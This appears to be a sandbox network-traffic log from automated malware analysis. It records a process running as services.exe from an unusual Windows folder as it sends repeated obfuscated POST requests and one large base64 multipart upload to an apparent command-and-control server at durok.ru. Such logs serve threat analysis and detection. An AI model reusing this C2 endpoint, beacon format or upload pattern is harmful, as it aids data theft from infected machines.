                                                                                                                              Dec 26, 2024 17:17:12.449456930 CET307OUTPOST /JavascriptPacketgeoserverWindowsFlowerwordpresswpCentral.php HTTP/1.1
                                                                                                                              Content-Type: application/octet-stream
                                                                                                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.93 Safari/537.36
                                                                                                                              Host: durok.ru
                                                                                                                              Content-Length: 2548
                                                                                                                              Expect: 100-continue
                                                                                                                              Dec 26, 2024 17:17:12.802196980 CET2548OUTData Raw: 59 51 5e 5d 51 58 59 5a 5e 58 52 54 56 5d 58 55 54 56 5b 5d 56 57 53 58 50 5a 5d 56 56 59 55 5a 5d 5b 55 5a 54 5b 5f 5d 5b 57 55 5d 58 56 54 58 53 51 58 5c 42 5a 5a 5d 5a 53 52 5e 57 5f 5d 40 51 5b 43 5e 59 5e 50 5a 5d 5a 5c 5b 5e 50 5e 5c 57 59
                                                                                                                              Data Ascii: YQ^]QXYZ^XRTV]XUTV[]VWSXPZ]VVYUZ][UZT[_][WU]XVTXSQX\BZZ]ZSR^W_]@Q[C^Y^PZ]Z\[^P^\WYSXP]V_VPX\_Z[__RGT_U\_[_ZU\PDQ^XP^_ZXWZZ\_[^XS^[\UVQ]^]X_\R[ZZR^ZYSWWSF]APZRWTYZXV[]VXS][YXUUVX]]Y_[ZT$+<P!"4X8*>'&$4/","<:X-9?< ++%"Z.#Z*6
                                                                                                                              Dec 26, 2024 17:17:13.626831055 CET25INHTTP/1.1 100 Continue
                                                                                                                              Dec 26, 2024 17:17:13.878189087 CET798INHTTP/1.1 200 OK
                                                                                                                              Date: Thu, 26 Dec 2024 16:17:13 GMT
                                                                                                                              Content-Type: text/html; charset=UTF-8
                                                                                                                              Transfer-Encoding: chunked
                                                                                                                              Connection: keep-alive
                                                                                                                              cf-cache-status: DYNAMIC
                                                                                                                              Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=koJ%2FIAhKN1gL8ANPMbkc81eD8KfxrivE1PcGALbGCaqiYaStWfaQCDUIqmnvuge%2FDQLnzIP8c4dANCGbhovuVUlqUuUtZUaq52%2BwNdFZAzBZ3rcn5%2FZOwIFqrg%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                                                                                              NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                              Server: cloudflare
                                                                                                                              CF-RAY: 8f82613b29645e86-EWR
                                                                                                                              alt-svc: h3=":443"; ma=86400
                                                                                                                              server-timing: cfL4;desc="?proto=TCP&rtt=4747&min_rtt=1614&rtt_var=6872&sent=3&recv=6&lost=0&retrans=0&sent_bytes=25&recv_bytes=2855&delivery_rate=54720&cwnd=239&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
                                                                                                                              Data Raw: 34 0d 0a 3d 59 5d 54 0d 0a 30 0d 0a 0d 0a
                                                                                                                              Data Ascii: 4=Y]T0


                                                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                              2192.168.2.449735104.21.93.162802308C:\Windows\GameBarPresenceWriter\services.exe
                                                                                                                              TimestampBytes transferredDirectionData
                                                                                                                              Dec 26, 2024 17:17:14.768544912 CET307OUTPOST /JavascriptPacketgeoserverWindowsFlowerwordpresswpCentral.php HTTP/1.1
                                                                                                                              Content-Type: application/octet-stream
                                                                                                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.93 Safari/537.36
                                                                                                                              Host: durok.ru
                                                                                                                              Content-Length: 2548
                                                                                                                              Expect: 100-continue


                                                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                              3192.168.2.449736104.21.93.162802308C:\Windows\GameBarPresenceWriter\services.exe
                                                                                                                              TimestampBytes transferredDirectionData
                                                                                                                              Dec 26, 2024 17:17:15.087529898 CET331OUTPOST /JavascriptPacketgeoserverWindowsFlowerwordpresswpCentral.php HTTP/1.1
                                                                                                                              Content-Type: application/octet-stream
                                                                                                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.93 Safari/537.36
                                                                                                                              Host: durok.ru
                                                                                                                              Content-Length: 2124
                                                                                                                              Expect: 100-continue
                                                                                                                              Connection: Keep-Alive
                                                                                                                              Dec 26, 2024 17:17:15.443037987 CET2124OUTData Raw: 59 5b 5b 58 54 58 5c 52 5e 58 52 54 56 5d 58 53 54 5d 5b 5b 56 55 53 5a 50 5a 5d 56 56 59 55 5a 5d 5b 55 5a 54 5b 5f 5d 5b 57 55 5d 58 56 54 58 53 51 58 5c 42 5a 5a 5d 5a 53 52 5e 57 5f 5d 40 51 5b 43 5e 59 5e 50 5a 5d 5a 5c 5b 5e 50 5e 5c 57 59
                                                                                                                              Data Ascii: Y[[XTX\R^XRTV]XST][[VUSZPZ]VVYUZ][UZT[_][WU]XVTXSQX\BZZ]ZSR^W_]@Q[C^Y^PZ]Z\[^P^\WYSXP]V_VPX\_Z[__RGT_U\_[_ZU\PDQ^XP^_ZXWZZ\_[^XS^[\UVQ]^]X_\R[ZZR^ZYSWWSF]APZRWTYZXV[]VXS][YXUUVX]]Y_[ZT$?W0?_%!24Z/)=B-'B (W7:9)(C+ ;)%"Z.#Z*6
                                                                                                                              Dec 26, 2024 17:17:16.264548063 CET25INHTTP/1.1 100 Continue
                                                                                                                              Dec 26, 2024 17:17:16.545506954 CET946INHTTP/1.1 200 OK
                                                                                                                              Date: Thu, 26 Dec 2024 16:17:16 GMT
                                                                                                                              Content-Type: text/html; charset=UTF-8
                                                                                                                              Transfer-Encoding: chunked
                                                                                                                              Connection: keep-alive
                                                                                                                              cf-cache-status: DYNAMIC
                                                                                                                              Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=W%2FTZ8%2BXoAAVd9WVqkHqxv1pkRvVhO1nwAXEw6HI3JxRLDKLz1lONaIEfIo3bLPWPyodLcLy%2FiS2rMrePgJe08AZ4tnoV24NYTky4WzC70QebpAwrNIRennCcFQ%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                                                                                              NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                              Server: cloudflare
                                                                                                                              CF-RAY: 8f82614b9a1a0f89-EWR
                                                                                                                              alt-svc: h3=":443"; ma=86400
                                                                                                                              server-timing: cfL4;desc="?proto=TCP&rtt=3202&min_rtt=1629&rtt_var=3757&sent=3&recv=7&lost=0&retrans=0&sent_bytes=25&recv_bytes=2455&delivery_rate=102708&cwnd=234&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
                                                                                                                              Data Raw: 39 38 0d 0a 0f 11 24 5b 29 07 2b 50 20 3f 33 0d 2b 13 07 08 29 1f 26 05 2b 32 39 14 3f 59 21 0e 3c 3b 23 51 20 39 3a 1e 28 2a 24 10 26 35 2e 1f 25 31 2e 5c 05 1d 24 06 3c 3b 2b 07 27 31 29 5e 29 10 26 0a 3d 00 17 18 24 11 2c 04 20 05 0b 04 23 31 0a 5b 2c 2c 33 00 39 2c 0e 5a 28 30 00 59 21 2d 21 51 0c 1f 38 55 22 07 28 01 26 00 26 0c 21 1e 23 56 25 3b 39 0f 36 2b 23 50 24 04 2c 05 32 0d 2b 57 23 03 30 0e 28 3d 08 5a 32 11 25 58 3e 03 25 5e 2d 02 23 54 03 3e 54 56 0d 0a 30 0d 0a 0d 0a
                                                                                                                              Data Ascii: 98$[)+P ?3+)&+29?Y!<;#Q 9:(*$&5.%1.\$<;+'1)^)&=$, #1[,,39,Z(0Y!-!Q8U"(&&!#V%;96+#P$,2+W#0(=Z2%X>%^-#T>TV0


                                                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                              4192.168.2.449738104.21.93.162802308C:\Windows\GameBarPresenceWriter\services.exe
                                                                                                                              TimestampBytes transferredDirectionData
                                                                                                                              Dec 26, 2024 17:17:15.314666033 CET331OUTPOST /JavascriptPacketgeoserverWindowsFlowerwordpresswpCentral.php HTTP/1.1
                                                                                                                              Content-Type: application/octet-stream
                                                                                                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.93 Safari/537.36
                                                                                                                              Host: durok.ru
                                                                                                                              Content-Length: 2548
                                                                                                                              Expect: 100-continue
                                                                                                                              Connection: Keep-Alive
                                                                                                                              Dec 26, 2024 17:17:15.670962095 CET2548OUTData Raw: 59 5a 5e 59 54 54 59 52 5e 58 52 54 56 5e 58 53 54 5c 5b 5b 56 52 53 54 50 5a 5d 56 56 59 55 5a 5d 5b 55 5a 54 5b 5f 5d 5b 57 55 5d 58 56 54 58 53 51 58 5c 42 5a 5a 5d 5a 53 52 5e 57 5f 5d 40 51 5b 43 5e 59 5e 50 5a 5d 5a 5c 5b 5e 50 5e 5c 57 59
                                                                                                                              Data Ascii: YZ^YTTYR^XRTV^XST\[[VRSTPZ]VVYUZ][UZT[_][WU]XVTXSQX\BZZ]ZSR^W_]@Q[C^Y^PZ]Z\[^P^\WYSXP]V_VPX\_Z[__RGT_U\_[_ZU\PDQ^XP^_ZXWZZ\_[^XS^[\UVQ]^]X_\R[ZZR^ZYSWWSF]APZRWTYZXV[]VXS][YXUUVX]]Y_[ZT$)1(]<9V!^..)$[3;Z#Z87?2[9*3+0)"Z.#Z*
                                                                                                                              Dec 26, 2024 17:17:16.492837906 CET25INHTTP/1.1 100 Continue
                                                                                                                              Dec 26, 2024 17:17:16.752651930 CET789INHTTP/1.1 200 OK
                                                                                                                              Date: Thu, 26 Dec 2024 16:17:16 GMT
                                                                                                                              Content-Type: text/html; charset=UTF-8
                                                                                                                              Transfer-Encoding: chunked
                                                                                                                              Connection: keep-alive
                                                                                                                              cf-cache-status: DYNAMIC
                                                                                                                              Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=TCs5UFbXWQhyQTxc3UqyWE0pLBD9l49Mn2Jh%2Baq%2BZx53uI7AQwm3ig2xGznmQkaE3A6PUpOlfVkN3XVkYD2nxYHB1oWtz7ZZLF7UHniXfRdZq72a9amZ2vuQ2w%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                                                                                              NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                              Server: cloudflare
                                                                                                                              CF-RAY: 8f82614d0a0b43d5-EWR
                                                                                                                              alt-svc: h3=":443"; ma=86400
                                                                                                                              server-timing: cfL4;desc="?proto=TCP&rtt=4054&min_rtt=1669&rtt_var=5396&sent=3&recv=8&lost=0&retrans=0&sent_bytes=25&recv_bytes=2879&delivery_rate=70354&cwnd=240&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
                                                                                                                              Data Raw: 34 0d 0a 3d 59 5d 54 0d 0a
                                                                                                                              Data Ascii: 4=Y]T
                                                                                                                              Dec 26, 2024 17:17:16.962876081 CET5INData Raw: 30 0d 0a 0d 0a
                                                                                                                              Data Ascii: 0


                                                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                              5192.168.2.449740104.21.93.162802308C:\Windows\GameBarPresenceWriter\services.exe
                                                                                                                              TimestampBytes transferredDirectionData
                                                                                                                              Dec 26, 2024 17:17:17.604784966 CET307OUTPOST /JavascriptPacketgeoserverWindowsFlowerwordpresswpCentral.php HTTP/1.1
                                                                                                                              Content-Type: application/octet-stream
                                                                                                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.93 Safari/537.36
                                                                                                                              Host: durok.ru
                                                                                                                              Content-Length: 2548
                                                                                                                              Expect: 100-continue
                                                                                                                              Dec 26, 2024 17:17:17.958554029 CET2548OUTData Raw: 59 59 5e 5f 54 59 59 5b 5e 58 52 54 56 5f 58 5b 54 5d 5b 5b 56 57 53 5b 50 5a 5d 56 56 59 55 5a 5d 5b 55 5a 54 5b 5f 5d 5b 57 55 5d 58 56 54 58 53 51 58 5c 42 5a 5a 5d 5a 53 52 5e 57 5f 5d 40 51 5b 43 5e 59 5e 50 5a 5d 5a 5c 5b 5e 50 5e 5c 57 59
                                                                                                                              Data Ascii: YY^_TYY[^XRTV_X[T][[VWS[PZ]VVYUZ][UZT[_][WU]XVTXSQX\BZZ]ZSR^W_]@Q[C^Y^PZ]Z\[^P^\WYSXP]V_VPX\_Z[__RGT_U\_[_ZU\PDQ^XP^_ZXWZZ\_[^XS^[\UVQ]^]X_\R[ZZR^ZYSWWSF]APZRWTYZXV[]VXS][YXUUVX]]Y_[ZT'(1_+)*!2 /=.?'"Z$$7?8V4!,:+>0$="Z.#Z*>
                                                                                                                              Dec 26, 2024 17:17:18.784296036 CET25INHTTP/1.1 100 Continue
                                                                                                                              Dec 26, 2024 17:17:19.038444996 CET796INHTTP/1.1 200 OK
                                                                                                                              Date: Thu, 26 Dec 2024 16:17:18 GMT
                                                                                                                              Content-Type: text/html; charset=UTF-8
                                                                                                                              Transfer-Encoding: chunked
                                                                                                                              Connection: keep-alive
                                                                                                                              cf-cache-status: DYNAMIC
                                                                                                                              Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=u7FKtwM9pMuv5PWkJo8XTFCPZC%2FTLVuytyIe3LD32lTBE4Na2lZPuTTNDWYagtpZhlwIeMZ6F72wjs0IQbxZ%2F29PK2msg18tywiTC1i2QCPSOH4LS%2BQHhbZjZg%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                                                                                              NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                              Server: cloudflare
                                                                                                                              CF-RAY: 8f82615b5e524321-EWR
                                                                                                                              alt-svc: h3=":443"; ma=86400
                                                                                                                              server-timing: cfL4;desc="?proto=TCP&rtt=4814&min_rtt=1770&rtt_var=6753&sent=3&recv=6&lost=0&retrans=0&sent_bytes=25&recv_bytes=2855&delivery_rate=55878&cwnd=248&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
                                                                                                                              Data Raw: 34 0d 0a 3d 59 5d 54 0d 0a 30 0d 0a 0d 0a
                                                                                                                              Data Ascii: 4=Y]T0
                                                                                                                              Dec 26, 2024 17:17:19.285165071 CET353OUTPOST /JavascriptPacketgeoserverWindowsFlowerwordpresswpCentral.php HTTP/1.1
                                                                                                                              Content-Type: multipart/form-data; boundary=----vFxcW3kj68Y95SNWcK2HlrJWzuTAkIi5Xg
                                                                                                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.93 Safari/537.36
                                                                                                                              Host: durok.ru
                                                                                                                              Content-Length: 120494
                                                                                                                              Expect: 100-continue
                                                                                                                              Dec 26, 2024 17:17:19.617876053 CET25INHTTP/1.1 100 Continue
                                                                                                                              Dec 26, 2024 17:17:19.626833916 CET14832OUTData Raw: 2d 2d 2d 2d 2d 2d 76 46 78 63 57 33 6b 6a 36 38 59 39 35 53 4e 57 63 4b 32 48 6c 72 4a 57 7a 75 54 41 6b 49 69 35 58 67 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 30 22
                                                                                                                              Data Ascii: ------vFxcW3kj68Y95SNWcK2HlrJWzuTAkIi5XgContent-Disposition: form-data; name="0"Content-Type: text/plainYQ^ZT[\W^XRTVXX[TP[_VTS[PZ]VVYUZ][UZT[_][WU]XVTXSQX\BZZ]ZSR^W_]@Q[C^Y^PZ]Z\[^P^\WYSXP]V_VPX\_Z[__RGT_U\_[_ZU\PDQ^XP^_ZXWZZ\_[^XS^[\
                                                                                                                              Dec 26, 2024 17:17:19.747776031 CET9888OUTData Raw: 58 69 38 45 46 72 34 4f 37 62 78 43 2f 56 79 53 77 30 55 36 64 34 6a 73 58 4a 63 52 58 44 4e 74 62 47 32 55 69 38 37 44 53 57 7a 69 44 2f 2f 5a 2f 6c 31 2f 50 75 2f 71 34 33 4e 74 62 39 59 65 6a 41 71 37 35 6c 47 41 62 67 55 4c 32 33 64 33 46 2b
                                                                                                                              Data Ascii: Xi8EFr4O7bxC/VySw0U6d4jsXJcRXDNtbG2Ui87DSWziD//Z/l1/Pu/q43Ntb9YejAq75lGAbgUL23d3F+NDjKy2eHcnGLtMk349Htp43TDXin2m03vilmQqZjyRLkEtZdqswZmQR/wd8CJY19DMND8I/fmGWGTjoD5ylPyo7sNvkjy5wHOvsbnBUJAChNjGrO/PkFGnd+LnPaZTcRLbdBtUULcPz+6gTX377Gb8t83IIZ9xmo4
                                                                                                                              Dec 26, 2024 17:17:19.748013973 CET4944OUTData Raw: 6d 45 2b 4e 53 32 37 69 62 4c 6a 41 67 78 66 34 41 51 47 31 52 49 65 68 43 36 66 52 73 70 35 75 4c 77 57 77 53 6d 44 52 58 6a 5a 55 6f 4d 76 51 62 45 4b 77 75 2f 50 73 74 55 6b 35 69 30 48 61 52 5a 47 43 37 55 6b 4e 30 6a 4e 61 44 41 41 6b 5a 77
                                                                                                                              Data Ascii: mE+NS27ibLjAgxf4AQG1RIehC6fRsp5uLwWwSmDRXjZUoMvQbEKwu/PstUk5i0HaRZGC7UkN0jNaDAAkZwHS0ABjXv7tAviBD/534GxQn4wqNPfEoF/uiUMc9E1vCjW6DuRl8Xlefsbnen1kytRX9MN5CsBq4ICXnNy6tPytqIE7uMFrsnZDMfI8GxaybNjj0bn4KqLc9nSWwgTqRuYEpDJlxJuqJY//h4T/vOmPjxOCT5GzHSe
                                                                                                                              Dec 26, 2024 17:17:19.748074055 CET2472OUTData Raw: 5a 63 50 32 4a 34 64 50 38 4f 72 34 6c 6c 6a 76 2f 51 4a 6f 70 6a 35 61 79 61 35 4c 78 4d 7a 6e 6f 31 75 42 71 6e 37 45 36 75 59 64 73 53 77 31 4f 6f 72 59 49 57 46 7a 39 75 2f 51 4c 62 34 33 67 7a 2b 4d 42 69 44 66 34 65 77 66 72 6b 67 58 74 2f
                                                                                                                              Data Ascii: ZcP2J4dP8Or4lljv/QJopj5aya5LxMzno1uBqn7E6uYdsSw1OorYIWFz9u/QLb43gz+MBiDf4ewfrkgXt/f0pdDM0mj8LTwDro3Jyt/u+8s5tMBKZ2o0Lti3+iNzZHWL/JFwpboiSSTsYPrLbT7/43dOt+5gNEeSZvKLmR8aaq73e2jYByQQIxfnyuSK+HcqsvR0ZNPqolFijGfA8EmedCxkhOpp54ZxfauT3lHcycd7b7gY7xE
                                                                                                                              Dec 26, 2024 17:17:19.748112917 CET2472OUTData Raw: 2b 53 31 57 46 79 75 30 6e 35 35 33 72 62 39 30 30 62 49 74 41 6c 62 47 4e 6e 70 48 2f 70 48 6a 64 39 75 4d 62 6c 31 2f 51 38 6f 69 74 62 56 6b 69 34 71 50 44 35 74 65 39 50 31 52 76 37 73 36 50 54 7a 48 39 38 61 63 4c 4a 65 36 43 6a 48 30 31 45
                                                                                                                              Data Ascii: +S1WFyu0n553rb900bItAlbGNnpH/pHjd9uMbl1/Q8oitbVki4qPD5te9P1Rv7s6PTzH98acLJe6CjH01Et0Y7Xgvc+UFiW6fHs+LJAL9u4Gd5Yb7d3WiFeyvQoln6x7bz8Vcta+MxF06zf/yC2aqZGXaTMMpZs+rVIaCsvtJ+l77gJMEZaMSpoy8uPOJ53mfgc82AKq27naCdUprrQlpq+ZOy8hEqAGEgnXbVkahwOto6P06CT
                                                                                                                              Dec 26, 2024 17:17:19.748241901 CET4944OUTData Raw: 41 79 2b 58 68 6c 4e 55 34 64 6e 36 2b 6b 6e 5a 4c 65 44 57 59 48 58 34 41 31 74 58 4e 56 59 4d 4e 69 78 32 38 4e 44 41 2b 67 30 4b 42 51 74 59 6d 6e 57 44 61 4b 69 45 53 61 44 5a 64 2f 45 74 30 5a 79 6b 45 57 44 58 64 47 79 64 52 4e 6d 64 50 6a
                                                                                                                              Data Ascii: Ay+XhlNU4dn6+knZLeDWYHX4A1tXNVYMNix28NDA+g0KBQtYmnWDaKiESaDZd/Et0ZykEWDXdGydRNmdPj0/qU7JYHWfjIst/MTjKXcC8kmIL0cu6JzCf8xCOdrZ8hjjAj3897MYM7/T6HCCGsLZaKQNrFiQuqV1iytIUokVJTa4aysa0Cfyw7CX1lGDwnghZ8Bg9gpecHLXOwPTo26DCAfRbsNl/H+TBYwj+RnebDdBewg1fyI
                                                                                                                              Dec 26, 2024 17:17:19.748481035 CET4944OUTData Raw: 43 56 77 6f 78 2b 77 30 5a 67 71 2f 33 62 30 74 76 5a 33 53 65 69 47 73 6e 6f 73 4f 5a 70 68 70 55 6e 48 71 63 64 7a 35 74 75 62 6e 36 71 53 77 75 69 2b 57 59 62 32 6c 69 6e 7a 42 2f 39 30 34 6e 4f 5a 68 68 4d 34 56 50 61 45 66 59 52 70 6d 58 39
                                                                                                                              Data Ascii: CVwox+w0Zgq/3b0tvZ3SeiGsnosOZphpUnHqcdz5tubn6qSwui+WYb2linzB/904nOZhhM4VPaEfYRpmX9nns4o/TY2z5cb1usXO5wtN3Ku5fbtjc6dj2zelz6YKXpS4jIu3+LXTGJMGGGggTYA9OYX75f1CP8o3ejc4j9sCVqIsGXBEJ/HmGTBiiS2zNjHvtpPuduaMUBr13pcvM7OiojhMZhUJDdeoLki+NVpdOvB3eHAxQCi
                                                                                                                              Dec 26, 2024 17:17:19.867589951 CET4944OUTData Raw: 66 32 35 69 51 67 73 36 7a 2f 6b 32 42 50 68 55 53 7a 4d 78 58 6b 37 77 4c 7a 7a 67 4a 7a 6b 68 54 55 4e 49 36 4f 44 2b 51 51 4e 46 47 33 45 7a 58 68 53 41 34 69 30 58 38 4a 74 4f 2f 30 73 58 78 35 58 61 44 69 53 31 39 47 67 31 4d 32 62 59 45 4c
                                                                                                                              Data Ascii: f25iQgs6z/k2BPhUSzMxXk7wLzzgJzkhTUNI6OD+QQNFG3EzXhSA4i0X8JtO/0sXx5XaDiS19Gg1M2bYELpuCYkeJJgaEOLBp7TxIgIotEebFL/rJIAjMfp3skQNFCk1VEAtbHn4EPQYqQmYiKhNqdtf6IsjVhElwuAID8DPB4Iy47NC75pv2V/wh7qr7aBZdzMAaG+IcLl4S+tmPknK7GmjfA66i6uExl3F5CrtiW7WXj7JizM
                                                                                                                              Dec 26, 2024 17:17:19.868036032 CET22248OUTData Raw: 46 46 6b 47 46 37 76 64 39 53 34 72 38 6b 64 6a 41 56 35 48 2b 62 74 39 69 73 4f 31 35 66 77 47 64 56 69 62 48 74 73 6e 71 76 35 65 6f 54 38 49 67 4f 66 46 74 30 5a 34 55 6c 66 6e 4d 69 58 57 72 6e 69 4c 65 4f 66 52 4d 2f 49 45 56 4e 53 61 64 2b
                                                                                                                              Data Ascii: FFkGF7vd9S4r8kdjAV5H+bt9isO15fwGdVibHtsnqv5eoT8IgOfFt0Z4UlfnMiXWrniLeOfRM/IEVNSad+RURgTLvcozdaKVaGz+MnTUbaz8IoOxpKvo3fv3W4se+3mDYvxGDt+FV9dmDQQnz5GXspAfdYBPnB9ttG12RJQ6yX7arbjtlcmFFb58rUHtgexzrlQ5Xs3y9DMKz2o0NaTt45sEvjoJ2GAylfIjtXk7vgC2tts8pjf
                                                                                                                              Dec 26, 2024 17:17:21.096920967 CET808INHTTP/1.1 200 OK
                                                                                                                              Date: Thu, 26 Dec 2024 16:17:20 GMT
                                                                                                                              Content-Type: text/html; charset=UTF-8
                                                                                                                              Transfer-Encoding: chunked
                                                                                                                              Connection: keep-alive
                                                                                                                              cf-cache-status: DYNAMIC
                                                                                                                              Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=0Pjf828uXTSj50tQ5KMDjWk50lUgjOjob0uYv2AHysiA%2BxzhqJPbVia4Pe9wXnjwvhKrY6EOilhs731u%2B%2Fc1rBbrW%2F%2FRQcEqywvYZc4VN8gflp4FQVSj1ttdwA%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                                                                                              NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                              Server: cloudflare
                                                                                                                              CF-RAY: 8f8261609c9f4321-EWR
                                                                                                                              alt-svc: h3=":443"; ma=86400
                                                                                                                              server-timing: cfL4;desc="?proto=TCP&rtt=6413&min_rtt=1707&rtt_var=8319&sent=70&recv=133&lost=0&retrans=0&sent_bytes=846&recv_bytes=123702&delivery_rate=1633109&cwnd=251&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
                                                                                                                              Data Raw: 34 0d 0a 3d 59 5d 54 0d 0a 30 0d 0a 0d 0a
                                                                                                                              Data Ascii: 4=Y]T0
                                                                                                                              Dec 26, 2024 17:17:21.104305029 CET307OUTPOST /JavascriptPacketgeoserverWindowsFlowerwordpresswpCentral.php HTTP/1.1
                                                                                                                              Content-Type: application/octet-stream
                                                                                                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.93 Safari/537.36
                                                                                                                              Host: durok.ru
                                                                                                                              Content-Length: 2128
                                                                                                                              Expect: 100-continue
                                                                                                                              Dec 26, 2024 17:17:21.436883926 CET25INHTTP/1.1 100 Continue
                                                                                                                              Dec 26, 2024 17:17:21.966892958 CET952INHTTP/1.1 200 OK
                                                                                                                              Date: Thu, 26 Dec 2024 16:17:21 GMT
                                                                                                                              Content-Type: text/html; charset=UTF-8
                                                                                                                              Transfer-Encoding: chunked
                                                                                                                              Connection: keep-alive
                                                                                                                              cf-cache-status: DYNAMIC
                                                                                                                              Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=ydJqlSuH9I4zw2eyqDRsJkcP%2BF6alwd3QE4RTPxhWQU5tCn%2FOSsFYrgXAWZ5AIv4ei54gYtKbCP4z503FG86ZTY2Vu3qU7WGYwwgaFpqjnn8jC2tnW46qHmFoQ%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                                                                                              NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                              Server: cloudflare
                                                                                                                              CF-RAY: 8f82616bfafa4321-EWR
                                                                                                                              alt-svc: h3=":443"; ma=86400
                                                                                                                              server-timing: cfL4;desc="?proto=TCP&rtt=6803&min_rtt=1681&rtt_var=7506&sent=76&recv=139&lost=0&retrans=0&sent_bytes=1679&recv_bytes=126137&delivery_rate=1681059&cwnd=254&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
                                                                                                                              Data Raw: 39 38 0d 0a 0f 11 24 5b 3e 39 09 1a 34 12 0d 08 2b 2d 3a 14 3e 1f 03 1a 3c 0c 0c 00 28 01 00 1e 2a 28 01 51 34 29 2d 00 3e 14 0e 59 25 26 22 1f 25 0b 2e 5c 05 1d 27 17 28 3b 2b 06 33 21 35 13 29 07 39 1a 3d 07 26 04 25 3f 2f 5d 20 3b 08 5c 23 32 38 59 2c 3c 0d 01 39 02 28 5b 28 56 3a 12 36 07 21 51 0c 1f 38 1f 23 3a 3f 13 27 3e 22 0d 35 0e 23 1f 25 28 32 10 22 28 34 09 26 2a 2f 10 25 33 24 0a 23 2e 27 55 28 13 08 58 26 3c 2a 01 29 03 25 5e 2d 02 23 54 03 3e 54 56 0d 0a 30 0d 0a 0d 0a
                                                                                                                              Data Ascii: 98$[>94+-:><(*(Q4)->Y%&"%.\'(;+3!5)9=&%?/] ;\#28Y,<9([(V:6!Q8#:?'>"5#%(2"(4&*/%3$#.'U(X&<*)%^-#T>TV0


                                                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                              6192.168.2.449741104.21.93.162802308C:\Windows\GameBarPresenceWriter\services.exe
                                                                                                                              TimestampBytes transferredDirectionData
                                                                                                                              Dec 26, 2024 17:17:17.695915937 CET307OUTPOST /JavascriptPacketgeoserverWindowsFlowerwordpresswpCentral.php HTTP/1.1
                                                                                                                              Content-Type: application/octet-stream
                                                                                                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.93 Safari/537.36
                                                                                                                              Host: durok.ru
                                                                                                                              Content-Length: 2128
                                                                                                                              Expect: 100-continue
                                                                                                                              Dec 26, 2024 17:17:18.052509069 CET2128OUTData Raw: 59 5d 5e 59 54 5c 59 57 5e 58 52 54 56 50 58 53 54 57 5b 5d 56 53 53 55 50 5a 5d 56 56 59 55 5a 5d 5b 55 5a 54 5b 5f 5d 5b 57 55 5d 58 56 54 58 53 51 58 5c 42 5a 5a 5d 5a 53 52 5e 57 5f 5d 40 51 5b 43 5e 59 5e 50 5a 5d 5a 5c 5b 5e 50 5e 5c 57 59
                                                                                                                              Data Ascii: Y]^YT\YW^XRTVPXSTW[]VSSUPZ]VVYUZ][UZT[_][WU]XVTXSQX\BZZ]ZSR^W_]@Q[C^Y^PZ]Z\[^P^\WYSXP]V_VPX\_Z[__RGT_U\_[_ZU\PDQ^XP^_ZXWZZ\_[^XS^[\UVQ]^]X_\R[ZZR^ZYSWWSF]APZRWTYZXV[]VXS][YXUUVX]]Y_[ZT')23+:9W6?.=*>$!$'/X"<$P#-*8<=5"Z.#Z*
                                                                                                                              Dec 26, 2024 17:17:18.874296904 CET25INHTTP/1.1 100 Continue
                                                                                                                              Dec 26, 2024 17:17:19.126353025 CET946INHTTP/1.1 200 OK
                                                                                                                              Date: Thu, 26 Dec 2024 16:17:18 GMT
                                                                                                                              Content-Type: text/html; charset=UTF-8
                                                                                                                              Transfer-Encoding: chunked
                                                                                                                              Connection: keep-alive
